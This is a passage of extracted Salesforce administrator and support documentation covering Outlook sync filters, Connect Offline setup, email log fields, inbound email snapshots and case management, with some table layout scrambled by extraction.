• When you use the “less than,” "greater than,” “less or equal,” or “greater or equal” operators on fields that have numeric
values, records with blank or “null” values are returned as if their value is zero (0).

• To limit results to records that are blank or contain “null” values for a particular field, choose the field and the “equals” or
“not equal to” operators, leaving the third field blank. For example, Amount equals returns records with blank amount
fields. You can search for blank values or other specified values at the same time. For example, Amount equals 1,,2
returns records where the Amount is blank or contains the value “1” or “2”. For example, if you create a workflow a filter
for accounts with the criteria Annual Revenue less than 100000, account records match if their Annual
Revenue is blank.

• To search for phone numbers, include the exact phone number formatting or example, Phone starts with (561).

• Separate search terms by commas to filter by more than one value. You can enter up to 80 characters, including commas
and spaces. For example, to search for accounts in California, New York, or Washington, use State contains
CA,NY,WA.

• When you filter on standard long text area fields, such as Description, only the first 1000 characters of the field are
searched.

• You can use the Get Record Count button to check how many records will sync for a sample Salesforce for Outlook user
based on the configuration's filters.

• If you need to reference user information in your contact filters, you can add the following merge fields to them.

DescriptionMerge Field

References the ID of the current user. This merge field can
be applied to fields that contain a user lookup. The valid

$User.ID

operators for this merge field are Equals and Not Equal To.
When creating mobile view filters that reference an owner
field, you can only use the $User.ID merge field.

References the username of the current user. This merge
field can be applied to any text or lookup field, except

$User.Username

picklists. The valid operators for this merge field are Equals,
Not Equal To, Greater Than or Equal, Less Than or Equal,
Contains, Does Not Contain, and Starts With.

References the first name of the current user. This merge
field can be applied to any text or lookup field, except

$User.Firstname

picklists. The valid operators for this merge field are Equals,
Not Equal To, Greater Than or Equal, Less Than or Equal,
Contains, Does Not Contain, and Starts With.

References the last name of the current user. This merge
field can be applied to any text or lookup field, except

$User.Lastname

picklists. The valid operators for this merge field are Equals,
Not Equal To, Greater Than or Equal, Less Than or Equal,
Contains, Does Not Contain, and Starts With.

References the first and last name of the current user. This
merge field can be applied to any text or lookup field, except

$User.Fullname
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DescriptionMerge Field

picklists. The valid operators for this merge field are Equals,
Not Equal To, Greater Than or Equal, Less Than or Equal,
Contains, Does Not Contain, and Starts With.

See Also:
Configuring Contact Filters for Salesforce for Outlook
Defining Data Sets for Salesforce for Outlook
Checking the Size of Salesforce for Outlook Data Sets

Entering Event Filters for Salesforce for Outlook

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

Sync Direction can’t be Don't syncTo create, edit, or delete data sets:

Data sets are subsets of the Salesforce records that Salesforce for Outlook users can sync. They consist of filters that limit
which records will sync. For example, most users may sync only current and future events, while some users may need to also
sync past events. Salesforce for Outlook syncs events based on their end dates rather than their start dates. For example, if
you’re syncing current and future events only, a two-day event that started yesterday still syncs.

The Data Sets section of the Outlook Configuration detail page shows a summary of the configuration's current event filters.

1. Define a data set for a configuration.
2. Under Events, enter one of these filters in the Greater or equal to field.

• TODAY—Syncs events that end on or after today. The start time is 12:00 a.m.
• LAST MONTH—Syncs events that ended on or after the first day of last month.
• LAST N DAYS—Syncs events that ended on or after a specified number of days ago, such as LAST 30 DAYS.

3. You can use the Get Record Count button to check how many records will sync for a sample Salesforce for Outlook user
based on the configuration's filters.

4. Save the data set.
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Note: The following items don’t sync: all-day events beginning on the first day you’re configured to sync, and event
attendees. Multiday events sync as single events in either direction. Multi-day events do sync.

See Also:
Sample Salesforce for Outlook Data Sets
Checking the Size of Salesforce for Outlook Data Sets
Syncing Events with Salesforce for Outlook

Entering Task Filters for Salesforce for Outlook

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

Sync Direction can’t be Don't syncTo create, edit, or delete data sets:

Data sets are subsets of the Salesforce records that Salesforce for Outlook users can sync. They consist of filters that limit
which records will sync. For example, most users may sync past-due tasks, while other users sync only current and future tasks.
Salesforce for Outlook syncs tasks based on their due dates rather than their start dates. For example, if you're syncing current
and future tasks only, a task that started yesterday still syncs.

The Data Sets section of the Outlook Configuration detail page shows a summary of the configuration's current task filters.
To enter task filters:

1. Define a data set for a configuration.
2. Under Tasks, enter one of these filters in the Greater or equal to field.

• TODAY—Syncs tasks that are due on or after today. The start time is 12:00 a.m.
• LAST MONTH—Syncs tasks that were due on or after the first day of last month.
• LAST N DAYS—Syncs tasks that were due on or after a specified number of days ago, such as LAST 30 DAYS.

3. You can use the Get Record Count button to check how many records will sync for a sample Salesforce for Outlook user
based on the configuration's filters.

4. Save the data set.
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Note: Recurring tasks and items flagged for follow-up on your Outlook To-Do list don't sync.

See Also:
Salesforce for Outlook Configurations Overview
Syncing Tasks with Salesforce for Outlook
Sample Salesforce for Outlook Data Sets

Sample Salesforce for Outlook Data Sets

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Because Salesforce for Outlook users with the same role usually have similar data requirements, many administrators create
Outlook configurations based on the positions in their organization. Below are sample data sets for common Salesforce groups.
Your Outlook users have unique needs, but you can use these examples as a reference to help you get started with Outlook
configurations.

Sales Manager

Sales managers usually need to see records they own and the records of the users who report to them. In addition, they
need to see the latest contact information for anyone associated with large deals in the pipeline and any upcoming
meetings that might be related to these deals. They may also like to have their Chatter contacts in Outlook.

Sample Outlook Configuration for Sales Managers:

Contacts
Contacts: User's Records, User's Team's Records
Contacts on Opportunities: User's Team's Records
Contacts on Accounts: User's Team's Records
Contacts in Chatter: Records User is Following

Events
Events: User's Records
Date greater or equal TODAY

Tasks
Tasks: User's Records
Date greater or equal TODAY

Sales Engineer

Sales Engineers often only need the contacts owned by them and the other members of their opportunity teams. They
may also want their Chatter contacts, a record of the past month's meetings, and a schedule of all future meetings.

Sample Outlook Configuration for Sales Engineers:

Contacts
Contacts: User's Records
Contacts on Opportunities: User's Opportunity Teams' Records
Contacts in Chatter: Records User is Following
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Events
Events: User's Records
Date greater or equal LAST MONTH

Tasks
Tasks: User's Records
Date greater or equal LAST MONTH

Account Executive

Account executives need to see contacts related to their accounts and opportunities. The opportunities are filtered so
only contacts related to open opportunities with a probability over 40% sync. They'd also like to sync their Chatter
contacts, all future meetings, and all meetings from the last two months.

Sample Outlook Configuration for Account Executives:

Contacts
Contacts on Opportunities: User's Records
(Probability (%) greater than 40) AND (Stage not equal to Closed Won,Closed Lost
Contacts on Accounts: User's Records
Contacts in Chatter: Records User is Following

Events
Events: User's Records
Date greater or equal LAST 60 DAYS

Tasks
Tasks: User's Records
Date greater or equal LAST 60 DAYS

See Also:
Defining Data Sets for Salesforce for Outlook

Checking the Size of Salesforce for Outlook Data Sets

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view Outlook data sets:

“Manage Email Client Configurations”To test Outlook data sets:

You can use the Get Record Count button to check how many records will sync for a sample Salesforce for Outlook user
based on the configuration's filters. If the numbers are too high or low, you can adjust the filters and check the size again. The
maximum record count is 5000 per object.

1. Define a data set for a configuration.
2. Under Data Set Size, click the lookup icon next to the User field.
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3. Select a user. To test maximum size, choose a user who owns a lot of records, even one who may not be currently assigned
to the configuration.

4. Click Get Record Count. The number of records that would sync between Outlook and Salesforce for that user appear.
5. Adjust the filters or selected user and retest the data set as needed. Nothing is saved until you click Save.

See Also:
Defining Data Sets for Salesforce for Outlook

ADMINISTERING CONNECT FOR OUTLOOK

Deploying Connect for Outlook System-Wide
Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

As an administrator, you can enforce data quality by controlling what users can do in regards to the movement of their data
when synchronizing contacts, tasks, and calendar events with Connect for Outlook. Follow these steps:

1. Start an Outlook client that has the Connect for Outlook add-in installed.
2. In Outlook, go to Tools > Salesforce Options.
3. In the Contacts, Events, and Tasks tabs, set the following fields as desired:

• Synchronize Data with Salesforce - Select this checkbox to allow users to synchronize that type of record.
If you deselect it, all Connect for Outlook features related to synchronization will be hidden from your users.

• Data Movement - Can be Export to Salesforce, Export with Overwrites to Salesforce, Import
from Salesforce, Import with Overwrites from Salesforce, or Synchronize with Salesforce.
These options determine how data moves between Salesforce and Connect for Outlook during synchronization.

• Always mark for sync - Select this checkbox to automatically select the Mark for Sync option on all newly
created items of the appropriate type that you save to your synchronization folder. For example, if you set this option
for contacts, any newly created contacts that you save to the synchronization folder are automatically included the next
time you sync with Salesforce. You can exclude an automatically-marked item from synchronization if you manually
unmark it.

Note: Records created or edited on the server or on other devices, such as a Blackberry, won't be marked for
sync.

• Click Advanced > Conflict and choose one of the following radio buttons: Ignore all conflicts, Notify me
when conflicts occur, Salesforce always wins, or Outlook always wins. These advanced options
determine how Connect for Outlook handles conflicts between Salesforce and Outlook data during synchronization.

4. Click the User Permissions tab. For reference, the Synchronization Settings area summarizes the settings you made in the
previous step.

5. In the User Permissions area, select or deselect the following settings:
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• User can modify which objects are synchronized

• User can modify field mappings

• User can modify conflict resolution options

• User can modify the direction of synchronizations

• User can quick create

This setting enables the Quick Create links for accounts, contacts, and leads on the Add to Salesforce and Change
Associations dialog boxes.

6. Click the Show File button to open the settings file O_Dictionary.xml. If necessary, change the XOverrideOptions
attribute to OverrideOptions and change the OverrideOptions value to “true.” Save and close the file.

7. If you have not already prohibited user access to program files, do so now. At a minimum, deny write access to C:\Program
Files\salesforce.com.

8. Using a tool such as Microsoft Systems Management Server (SMS), distribute the XML file to your users in the following
directory: C:\Program Files\salesforce.com\O3.

Note:  For Windows 2000 and XP users, note that this dictionary file takes precedence over the user-specific file
with the same name at C:\Documents and Settings\<user name>\Application
Data\salesforce.com\SM. For Windows Vista users, the user-specific file is located at C:\Users\<user
name>\AppData\Roaming\salesforce.com\SM.

9. When they start Connect for Outlook, users will only be able to perform the operations that you have enabled and will
not have access to the User Permissions tab in the options dialog box.

For information on using registry keys to customize Connect for Outlook for your users, see the Administering Connect for
Outlook tip sheet.

See Also:
Installing Connect for Outlook
Setting Connect for Outlook Options
Tip sheet: Administering Connect for Outlook
Installing Connect for Outlook
Setting Connect for Outlook Options
Tip sheet: Administering Connect for Outlook
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CONNECT OFFLINE

Desktop Client Access Overview
Available in: Enterprise, Unlimited, and Developer Editions

Connect for Outlook, Connect Offline, Connect for Office, and Connect for Lotus Notes are desktop clients that integrate
Salesforce with your PC. As an administrator, you can control which desktop clients your users can access as well as whether
users are automatically notified when updates are available. To set permissions for Salesforce for Outlook, use the “Manage
Email Client Configurations” permission.

You can set users' access to desktop client by editing their profiles.

The desktop client access options are:

MeaningOption

The respective client download page in users’ personal settings is hidden.
Also, users can't log in from the client.

Off (access denied)

The respective client download page in users’ personal settings is hidden.
Users can log in from the client but can't upgrade it from their current
version.

On, no updates

Users can download, log in from, and upgrade the client, but don't see
alerts when a new version is made available.

On, updates w/o alerts

Users can download, log in from, and upgrade the client. They can see
update alerts, and can follow or ignore them.

On, updates w/alerts

Users can download, log in from, and upgrade the client. When a new
version is available, they can see an update alert. They can't log in from
the client until they have upgraded it.

On, must update w/alerts

Connect Offline is the only client available with Developer Edition. In Personal, Group, and Professional Editions, all users
have the system default “On, updates w/o alerts” for all clients.

Note:

• Desktop client access is available only for users whose profiles have the “API Enabled” permission.

• If users in your organization have a Connect for Outlook version earlier than 2.0 (such as version 115), and their
profile setting is “Off (access denied)” or “On, must update w/alerts,” the error Invalid Salesforce API
request may occur when they attempt to log in to Connect for Outlook. Users with Connect for Outlook 2.0
or later will see an appropriate descriptive message.
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If users can see alerts and they have logged in to Salesforce from the client in the past, an alert banner automatically appears
in the Home tab when a new version is available. Clicking the banner opens the Check for Updates page, where users can
download and run installer files. From their personal settings, users can also access the Check for Updates page, regardless of
whether an alert has occurred.

Installing Connect Offline
Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

User Permissions Needed

“Read” on the appropriate type of record such as accounts,
contacts, or opportunities

To view records in Connect Offline:

“Create,” “Edit,” or “Delete” on the appropriate type of record
such as accounts, contacts, or opportunities

To update records in Connect Offline:

Allocating Connect Offline Licenses

For organizations using Unlimited, Enterprise, and Developer Editions, salesforce.com provides one Connect Offline license
for each Salesforce license. Organizations using Professional Edition must purchase Connect Offline licenses separately. Users
without a Connect Offline license can use for a 30-day trial period.

To allocate a Connect Offline license to a user within your organization, edit the user's record and select the Offline User
checkbox. Users must have this checkbox selected to use Force.com Connect Offline.

Verifying System Requirements

The system requirements for Connect Offline are:

• Microsoft® Internet Explorer® 6, 7, or 8 (We don’t support other browsers, including Mozilla® Firefox®, Apple® Safari®,
and Google Chrome™.)

• Microsoft Windows® 2000, Windows XP, Windows Vista®, or Windows 7

Note:  You can use the 64-bit version of Windows 2000, Windows XP, Windows Vista, or Windows 7, but along
with any of these, you must use the 32-bit version of Internet Explorer 8 with its Compatibility View option.

• 256 MB of RAM (512 MB recommended)
• 20 MB disk space minimum (250 MB recommended depending on the size of the briefcase)
• Intel® Pentium® II processor, 500 MHz or above

Installing an Individual Client

To download and install the Connect Offline client:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:
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• If you clicked Setup, select Desktop Integration > Connect Offline.
• If you clicked My Settings, select Desktop Add-Ons > Connect Offline.

3. Click Install Now.

Note:  You must have administrator privileges on the computer on which you install Connect Offline.

4. Click Yes when prompted to install and run the client.
5. Follow the prompts in the setup wizard to complete the installation.
6. Log in to Connect Offline to verify the installation.

Deploying Connect Offline System-Wide

If your organization uses Windows, network administrators can install Connect Offline on several machines at once. For mass
deployments, go to the Connect Offline page in your personal settings and click the link to download the zipped MSI package.

Tip:  The login history lists the version of Connect Offline that each user is using.

Updating Connect Offline

Salesforce.com periodically releases Connect Offline updates and notifies users according to settings in their user profiles.

See Also:
What is Your Default Connect Offline Briefcase Contents?
Working with Connect Offline
Troubleshooting Connect Offline

Sample Offline Data Sets
Many administrators create briefcase configurations based on the functional groups in their organization because users in the
same group usually have similar offline requirements for data. Below are sample data sets for common Salesforce groups. Your
Connect Offline users have unique needs, but you can use the examples as a reference to help you get started with data sets in
briefcase configurations.

Sales Manager

Sales managers usually need to see records they own and also the records of their subordinates. They also tend to closely
monitor large deals in the pipeline.

This briefcase configuration allows sales managers to see:

• The opportunities they own
• The opportunities owned by users who report to them in the role hierarchy
• All opportunities scheduled to close in the current quarter with an amount greater than $100,000
• All accounts related to the opportunities
• A subset of their contact and activity records
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Figure 5: Sample Briefcase Configuration for Sales Managers

Sales Engineer

The sales engineer briefcase configuration retrieves opportunities owned by the other members of the user's opportunity team,
but does not include the user's records. The sales engineer briefcase configuration is opportunity-based because all accounts
and contacts included in the briefcase are related to the opportunities. The sales engineers would see:

• Up to 5000 opportunities they own and up to 5000 opportunities that list them on the opportunity team. These opportunities
must be either open or have a close date in the current month, the past two months, or up to 24 months in the future. If
more than 5000 opportunities exist, the 5000 most recently modified records are synchronized.

• All accounts, contacts, and opportunity products related to those opportunities
• A subset of tasks and events related to those opportunities

Figure 6: Sample Briefcase Configuration for Sales Engineers

Account Executive

The account executive briefcase configuration is account-based, which means the briefcase includes the user's accounts and
opportunities related to those accounts. The opportunities are filtered so that only open opportunities scheduled to close in
the current quarter are synchronized. The Task and Event child data sets retrieve all activities related to those opportunities,
not just the user's activities. Only open tasks and events from a two-month window are sent to the briefcase. The Task and
Event parent data sets pull down just the user's activities and restrict the activities to open tasks and events scheduled for the
next 30 days. The Contact data set delivers the user's contact records, but limits the record count to the 500 most recently
active contacts.
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Figure 7: Sample Briefcase Configuration for Account Executives

See Also:
Defining Connect Offline Data Sets
Managing Connect Offline Briefcase Configurations

MONITORING EMAIL

What Are Email Logs?
Available in: All Editions except for Database.com

User Permissions Needed

“Modify All Data”To access email logs:

Email logs are CSV files that contain information about all email sent through Salesforce over the last 30 days. Logs contain
data such as:

• The email address of each email sender and recipient

• The date and time each email was sent

• The delivery status of each email

• Any error code associated with each email

You can use email logs to troubleshoot encountered errors.

To manage email logs, from Setup, click Monitoring > Email Log Files or Logs > Email Log Files.

• To request a new email log, click Request an Email Log. Due to the volume of email processed through Salesforce, requests
are queued in the order that they are received. Email logs should be available within 30 minutes of your request.
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• The pending email log requests list provides the status on email log requests that have not yet completed. You can have a
maximum of three pending log requests at any time.

• The email log errors list provides descriptions for requests that failed.

◊ To resubmit a request that failed, click Resubmit.
◊ To delete a request that failed, click Del.

Warning:  You cannot resubmit a failed request if it requires data that has exceeded the 30 day limit, or if you
already have three pending requests.

• To download an email log, click Download (.zip). Email logs are CSV files contained within a compressed file. Logs
contribute to your overall file storage limits.

• To delete an email log, click Del.

For a summary of the information returned from an email log, see Viewing Email Logs on page 1651.

Requesting an Email Log
Available in: All Editions except for Database.com

User Permissions Needed

“Modify All Data”To access email logs:

To request a new email log for your organization:

1. From Setup, click Monitoring > Email Log Files or Logs > Email Log Files.
2. Click Request an Email Log.

You can have a maximum of three pending log requests at one time. If you already have three pending requests, you cannot
request another log until at least one of those requests completes.

3. Enter a Start Time and End Time range for the email log you want to retrieve. Email logs are available for messages
sent within the past 30 days prior to your request.

Note:  Each email log can span a maximum of seven days. To see email log data from a period of time greater
than seven days, create multiple requests.

4. Optionally, you can filter an email log to only include rows where a specific domain name or email address appears in a
field, such as Recipient or Message ID Header. To enter more than one filter term, separate each value with a comma.
If you leave this field blank, the log is not filtered and all email addresses are returned within the specified time range.

5. Enter the email addresses that you want to receive notification when the email log request is complete. Separate each email
address with a comma.
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To clear a request and return to the email log overview page, click Cancel.

See Also:
Viewing Email Logs

Viewing Email Logs
Available in: All Editions except for Database.com

User Permissions Needed

“Modify All Data”To access email logs:

The following table describes the format of the log file and lists examples of its fields:

ExampleDescriptionFieldColumn

3/06/2009 13:37The date and time the
message was sent in GMT

Date/TimeA

16/A4-20983-88E21E84The unique internal ID of the
message

Internal Message IDB

TIndicates the final email event
in the mail server. Events can
be one of the following values:

R - Reception

The email was
successfully received.

Mail EventC

D - Delivery

The email was
successfully sent.

T - Transient Failure

The email transmission
was delayed. Salesforce
will retry delivery over a
24-hour period. The first
retry occurs five minutes
after the first transient
failure, the second occurs
ten minutes after that,
the third twenty minutes
after that, and so on.
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ExampleDescriptionFieldColumn

P - Permanent Failure

The email could not be
delivered.

admin@acme.comThe email address of the
person to whom the email is
sent

RecipientD

user@acme.comThe email address of the
person who sent the email

SenderE

10.0.0.1The IP address of the
application server that

Remote HostF

delivered the email to the
email server

11856The size of the emailBytes TransferredG

00540000000rSXTThe Salesforce ID of the user
who sent the email

User IDH

21749386.
106091224027705044.

The ID header at the
beginning of every email

Message ID HeaderI

JavaMail.
sfdc@na2-app4-2-sjl.
ops.sfdc.net

11The number of attempts made
to deliver the email

Retry CountJ

300The number of seconds the
email had to wait before being
delivered

Seconds in QueueK

during RCPT TOThe final stage the delivery
was in before it was logged.

Delivery StageL

Below are the values of the
stages in the order that they
appear during the SMTP
sequence:

BANNER

The SMTP connection
response

EHLO

The beginning of the
session with the mail
server
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ExampleDescriptionFieldColumn

STARTTLS

Establishes a secure
communication session
with the email server

MAIL FROM

Announces the sender of
the email

RCPT TO

Announces the recipient
of the email

DATA

Announces that the
subsequent text is the
email message

BODY

The state when the body
of the email is being sent
to the recipient

RSET

Resets the server state,
ending the session

In addition, there are
responses that may appear at
any point during the delivery
sequence:

while not connected

The client is trying to
establish a connection

while idle

The client has connected,
but is not sending or
receiving any commands

reading confirmation

A command was sent and
the client is waiting for a
response

handshaking TLS

An error occurred while
trying to establish a
secure connection

1653

Viewing Email LogsSetting Up Salesforce-Integrated Email



ExampleDescriptionFieldColumn

out of band bounce

The receiving server
accepted a command, but
then for an unknown
reason rejected it

in unknown state

An unknown error has
occurred

relay.my.orgThe hostname of the
designated relay system

Relay AddressM

587The port of the designated
relay system

Relay PortN
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ExampleDescriptionFieldColumn

421 no adequate
servers

After every delivery stage, a
three-digit response code is
sent from the mail server. The

Delivery Status
Notification

O

first number indicates whether
the command was successful
or unsuccessful; the second
digit indicates the type of
error; and the third provides
additional information to
resolve the potential problem.

The five possible values of the
first digit are:

1xx - Positive
Preliminary reply

The command was
accepted, but no response
has been sent

2xx - Positive
Completion reply

The requested action has
successfully completed

3xx - Positive
Intermediate reply

The command was
accepted, but the
requested action needs
more information

4xx - Transient
Negative Completion
reply

The command was not
accepted and the
requested action did not
occur. However, the error
condition is temporary
and the action may be
requested again.

5xx - Permanent
Negative Completion
reply

The command was not
accepted and the
requested action did not
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ExampleDescriptionFieldColumn

occur

Every email service provider
implements the codes
differently, so there is no
comprehensive list for what
the second or third digits
indicate.

For more information on these
codes, view the official SMTP
documentation, section 4.2.1:
http://
www.ietf.org/rfc/rfc2821.txt
?number=2821

See Also:
What Are Email Logs?

Troubleshooting with Inbound Email Snapshots
Take a snapshot of inbound email messages so you can more easily troubleshoot inbound email errors.

Available in: All Editions except for Database.com

User Permissions Needed

“Modify All Data”To request, view, download, and delete email snapshots:

Inbound email snapshots capture a copy of inbound email messages, helping you diagnose issues with email services such as
Email to Salesforce, Email-to-Case, and Apex email services. Request a snapshot by specifying criteria for the email’s To and
From addresses, and when an inbound message meets that criteria, the snapshot records a single copy that you can view and
download. The email itself is processed normally without alteration. Snapshots contain the:

• Sender’s address
• Inbound email service address
• Date and time of the snapshot
• Full message contents, including headers and attachments

To access inbound email snapshots, from Setup, click Monitoring > Email Snapshots.

• To request an inbound email snapshot, enter criteria for the To address (required) and From address (optional). Then
click Request Snapshot.
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The requested snapshot is added to the list of Pending and Completed Snapshots. As soon as an inbound message meets
your specified criteria, we take a snapshot and complete the request.

• To view a completed snapshot, you can:

DescriptionOption

Click Show Details to see when the snapshot was taken,
the sender’s address, and the inbound email service address.
Click Hide Details to collapse the details section.

View snapshot details

Click Download then either open the email as a .txt file or
save it to your computer.

Download the snapshot

Consider these tips when using inbound email snapshots:

• You can have a maximum combined total of 25 pending and completed snapshots. Delete some to free up space for new
snapshots. You can delete any pending or completed snapshot, even if someone else originally requested it.

• Deleted snapshots are permanently deleted. They’re not moved to the Recycle Bin.
• When specifying criteria for the To address, keep these tips in mind.

◊ The criteria apply to any of the addresses specified in an email’s To, CC, or BCC fields (not only the To field).
◊ Inbound email service addresses always end in salesforce.com.
◊ You may want to look up the addresses your organization uses. This table summarizes where to find them.

Where to find addressesType of inbound email address

Every user can click Email > My Email to Salesforce in
their personal settings to view the unique address assigned
to them by Email to Salesforce.

The user’s unique Email to Salesforce address

From Setup, click Customize > Cases > Email-to-Case
to open the Email-to-Case settings page. View the Routing
Addresses section.

Email routing addresses for Email-to-Case or On-Demand
Email-to-Case

From Setup, click Develop > Email Services, then the
name of an email service.

Your organization’s email service addresses

• You can use an asterisk (*) wildcard in both the local-part of the email address (the part before the @ symbol) and in the
domain-part (the part after the @ symbol). Spaces, commas, and semicolons aren’t valid characters. Each address field can
contain a maximum of 255 characters.

• You can click Request Snapshot multiple times if you want to request more than one snapshot with identical criteria.
• If you believe a snapshot should have completed but it still shows Pending status, try refreshing the page.
• Snapshots don’t expire. Requested snapshots can remain in Pending status indefinitely if no inbound emails match the

specified criteria. Completed snapshots persist until you delete them.
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Welcome, Support Agents
This documentation is for support agents and other users who want to use Salesforce customer service and support features,
also known as the Service Cloud. It’s organized by tasks so that you can quickly find information about features that will help
you provide customer service. For example, information about emailing customers is located in a section named Responding
to Customers, rather than a section that includes the feature name, Email-to-Case. However, you can search this documentation
by keywords to find a feature name or support solution. Note that this documentation doesn’t include many tasks for setting
up features. For those, please refer to the documentation, Set Up and Maintain Customer Support Tools.

Together, Support Your Customers and Set Up and Maintain Customer Support Tools contains the information you need to set
up and deliver customer service with Salesforce.

TRACKING CUSTOMER INQUIRIES

CASES

Cases Overview
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

A case is a description of a customer’s feedback, problem, or question. Use cases to track and solve your customers’ issues. You
can quickly create, edit, locate, and view cases from the Cases tab. To gather customer feedback from your company’s website
and customer emails, set up:

• Web-to-Case

• Email-to-Case or On-Demand Email-to-Case

Your customers can also create cases on your Customer Portal, Self-Service portal, or Chatter Answers.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

If the Service Cloud console is set up, you can find, view, and edit cases and their related records on one screen.

SUPPORT YOUR CUSTOMERS
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If entitlements are set up, you can determine if a customer is eligible to receive support and see if existing cases are close to
violating an entitlement process.

See Also:
Cases Home
Service Cloud Console Overview
Entitlement Management Overview
Chatter Answers Overview
Case Management Implementation Guide

Cases Home
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo view Cases tab:

“Read” on casesTo view cases:

“Create” on casesTo create cases:

Clicking on the Cases tab displays the cases home page.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

To view the cases in a queue, choose that queue list from the drop-down list. For every queue your administrator creates,
Salesforce adds a corresponding queue list view.

Note:  The organization-wide sharing model for an object determines the access users have to that object's records
in queues:

Public Read/Write/Transfer

Users can view and take ownership of records from any queue.

Public Read/Write or Public Read Only

Users can view any queue but only take ownership of records from queues of which they are a member or,
depending on sharing settings, if they are higher in the role or territory hierarchy than a queue member.

Private

Users can only view and accept records from queues of which they are a member or, depending on sharing
settings, if they are higher in the role or territory hierarchy than a queue member.

Regardless of the sharing model, users must have the “Edit” permission to take ownership of records in queues
of which they are a member. Administrators, users with the “Modify All” object-level permission for Cases, and
users with the “Modify All Data” permission, can view and take records from any queue regardless of the sharing
model or their membership in the queue.
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• If the Service Cloud console is set up, you can find, view, and edit cases and their related records on one screen.

• In the Recent Cases section, select an item from the drop-down list to display a brief list of the top cases matching that
criteria. From the list, you can click any case name to go directly to the case detail. Toggle the Show 25 items and Show
10 items links to change the number of items that display. The fields you see are determined by the “Cases Tab” search
layout defined by your administrator and by your field-level security settings (available in Enterprise, Unlimited, and
Developer Editions only). The Recent Cases choices are:

DescriptionRecent Cases Choice

The last ten or twenty-five open cases that you own, with
the oldest case listed first. This list only includes records
owned by you.

My Open

The last ten or twenty-five cases you viewed, with the most
recently viewed case listed first. This list is derived from your

Recently Viewed

recent items and includes records owned by you and other
users.

• In the Recent Cases section, click New to create a new case.

• Under Reports, click any report name to jump to that report.

• In Professional, Enterprise, Unlimited, and Developer Edition organizations, select any of the links under Case Tools to
access utilities for managing your cases.

• If cases are shared with external contacts via Salesforce to Salesforce, choose one of the list views under Cases from
Connections to view cases that your business partners have shared with you.

See Also:
Cases Overview
Displaying and Editing Cases
Creating Cases
Cloning Cases
Closing Cases
Deleting Cases
Service Cloud Console Overview
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Viewing Case Lists

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo view case lists:

“Create” on casesTo create cases:

The cases list page displays a list of cases in your current view. To show a filtered list of items, select a predefined list from
the View drop-down list, or click Create New View to define your own custom views.To edit or delete any view you created,
select it from the View drop-down list and click Edit.

If the Service Cloud console is set up, view case lists by selecting Cases from the navigator tab (if Cases is available).

• Click Edit or Del to edit or delete a case.

• If Chatter is enabled, click  or  to follow or stop following a case in your Chatter feed.
• Click New Case or select Case from the Create New drop-down list in the sidebar to create a case.

• Select the box next to one or more cases and then use the buttons at the top of the view to close the cases, take ownership
of them, or change the case status or owner.

Note:  Cases with a red arrow have been automatically escalated via your organization’s escalation rules.

Taking Ownership of Cases
To take ownership of cases in a queue, view the queue list view, check the box next to one or more cases, and then click Accept.
Professional, Enterprise, Unlimited, and Developer Edition organizations can grant additional access to cases beyond what
the sharing model allows.

Note:  The organization-wide sharing model for an object determines the access users have to that object's records
in queues:

Public Read/Write/Transfer
Users can view and take ownership of records from any queue.

Public Read/Write or Public Read Only
Users can view any queue but only take ownership of records from queues of which they are a member or,
depending on sharing settings, if they are higher in the role or territory hierarchy than a queue member.

Private
Users can only view and accept records from queues of which they are a member or, depending on sharing
settings, if they are higher in the role or territory hierarchy than a queue member.

Regardless of the sharing model, users must have the “Edit” permission to take ownership of records in queues of
which they are a member. Administrators, users with the “Modify All” object-level permission for Cases, and users
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with the “Modify All Data” permission, can view and take records from any queue regardless of the sharing model
or their membership in the queue.

See Also:
Cases Overview
Displaying and Editing Cases

Changing Multiple Cases

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Transfer Cases” OR “Transfer Record”

AND

“Edit” on cases

To change case owner:

“Manage Cases”To close and change the status of cases:

From any case list page, administrators can “mass update” multiple cases at once. From any queue list view, users can take
ownership of one or more cases if they are a member of that queue, if they are higher in the role or territory hierarchy than a
queue member, or if the organization’s default sharing for cases is Public Read/Write/Transfer. Simply check the boxes next
to the desired cases and click the appropriate button. The following actions are possible:

• Accept—Assigns you as the owner of the selected cases in a queue list view. Any attached open activities are transferred
to you as well. In organizations that do not have the Public Read/Write/Transfer sharing model for cases, you can take
cases only from queues of which you are a member or if you are higher in the role hierarchy than a queue member.

• Change Owner—Assigns the cases to the one user or queue you specify. Any attached open activities are transferred to
the new owner as well. When putting cases in a queue, the open activities are not transferred.

In addition to the required user permissions for this feature, you must have read sharing access to the cases you are updating.

Note:  When you change case ownership, any associated open activities that are owned by the current case owner
are transferred to the new owner.

• Close—Closes the selected cases using the values you specify. You can set a common Status and Reason and add any
comments.

You must have the “Manage Cases” permission and read/write sharing access to the cases to use this feature.

• Change Status—Changes the Status of the cases to the value you set.
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You must have the “Manage Cases” permission and read/write sharing access to the cases to use this feature.

See Also:
Displaying and Editing Cases

Creating Cases
Case assignment rules, Web-to-Case, Email-to-Case, and the Self-Service portal are available in: Professional, Enterprise,
Unlimited, and Developer Editions.

User Permissions Needed

“Read” on casesTo view cases:

“Create” on casesTo create cases:

You can create cases in various ways:

• Your administrator can set up Web-to-Case and either Email-to-Case or On-Demand Email-to-Case to automatically
capture cases from your website and customer emails.

• Your customers can log their own cases from the Customer Portal, Self-Service portal, or Chatter Answers.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
